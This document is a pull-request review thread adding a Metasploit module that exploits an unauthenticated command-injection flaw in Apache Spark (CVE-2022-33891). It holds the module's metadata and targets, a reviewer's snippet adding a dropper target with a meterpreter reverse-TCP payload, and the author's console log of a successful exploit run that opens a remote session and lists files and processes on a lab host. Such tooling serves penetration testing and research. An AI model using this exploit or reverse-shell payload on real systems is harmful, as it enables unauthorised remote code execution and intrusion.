modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Spark Unauthenticated Command Injection RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection vulnerability in Apache Spark.
+          Successful exploitation results in remote code execution under the context of the Spark application user.
+
+          The command injection occurs because Spark checks the group membership of the user passed
+          in the ?doAs parameter by using a raw Linux command.
+
+          It is triggered by a non-default setting called spark.acls.enable.
+          This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.
+
+          Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability
+          'H00die Gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure
+          ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis
+          ['CVE', '2022-33891']
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory
+            }
+          ],
```

Comment:
You could presumably also add a `:dropper` target which utilises the command stager. See comments in `exploit` method.

```ruby
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
```

Reply:
Added in the Linux dropper.
Tested with  vulnerable target and meterpreter session is established, however `getuid` and `sysinfo` are not working. All other shell commands are functional including the spawn of a shell.

```
msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set target 1
target => 1
msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.43:8080 can be exploited!
[*] Perform sleep test of 10 seconds...
[+] The target is vulnerable. Sleep was around 10 seconds [10.031537132]!
[*] Exploiting...
[*] Sending stage (3020772 bytes) to 192.168.100.43
[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.43:62479) at 2022-08-27 17:38:52 +0000
[*] Command Stager progress - 100.00% done (810/810 bytes)

meterpreter > sysinfo
[-] stdapi_sys_config_getuid: Operation failed: 1
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 1
meterpreter > ls
Listing: /opt/bitnami/spark
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  0      fil   2022-07-14 06:31:09 +0000  .buildcomplete
100644/rw-r--r--  22878  fil   2022-07-14 06:31:09 +0000  LICENSE
100644/rw-r--r--  57677  fil   2022-07-14 06:31:09 +0000  NOTICE
040755/rwxr-xr-x  4096   dir   2022-07-14 06:46:55 +0000  R
100644/rw-r--r--  4512   fil   2022-07-14 06:31:08 +0000  README.md
100644/rw-r--r--  167    fil   2022-07-14 06:31:09 +0000  RELEASE
040755/rwxr-xr-x  4096   dir   2022-07-14 06:46:56 +0000  bin
040775/rwxrwxr-x  4096   dir   2022-08-27 11:51:57 +0000  conf
040755/rwxr-xr-x  4096   dir   2022-07-14 06:46:56 +0000  data
040755/rwxr-xr-x  4096   dir   2022-07-14 06:46:56 +0000  examples
040775/rwxrwxr-x  16384  dir   2022-07-14 06:47:23 +0000  jars
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:12 +0000  kubernetes
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:31 +0000  licenses
040775/rwxrwxr-x  4096   dir   2022-08-27 11:57:34 +0000  logs
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:13 +0000  python
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:13 +0000  sbin
040775/rwxrwxr-x  4096   dir   2022-08-27 11:51:57 +0000  tmp
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:23 +0000  venv
040775/rwxrwxr-x  4096   dir   2022-07-14 10:25:03 +0000  work
040755/rwxr-xr-x  4096   dir   2022-07-14 06:47:23 +0000  yarn

meterpreter > pwd
/opt/bitnami/spark
meterpreter > ps

Process List
============

 PID    PPID   Name   Arch    Path
 ---    ----   ----   ----    ----
 1      0      bash   x86_64  /bin/bash
 34     1      bash   x86_64  /bin/bash
 39     34     java   x86_64  /opt/bitnami/java/bin/java
 88     0      sh     x86_64  /bin/dash
 5795   88     bash   x86_64  /bin/bash
 14847  5795   watch  x86_64  /usr/bin/watch
 24537  39     bash   x86_64  /bin/bash
 24540  24537  bash   x86_64  /bin/bash
 24543  24540  bash   x86_64  /bin/bash
 24545  24543  PESyb  x86_64  /tmp/PESyb
```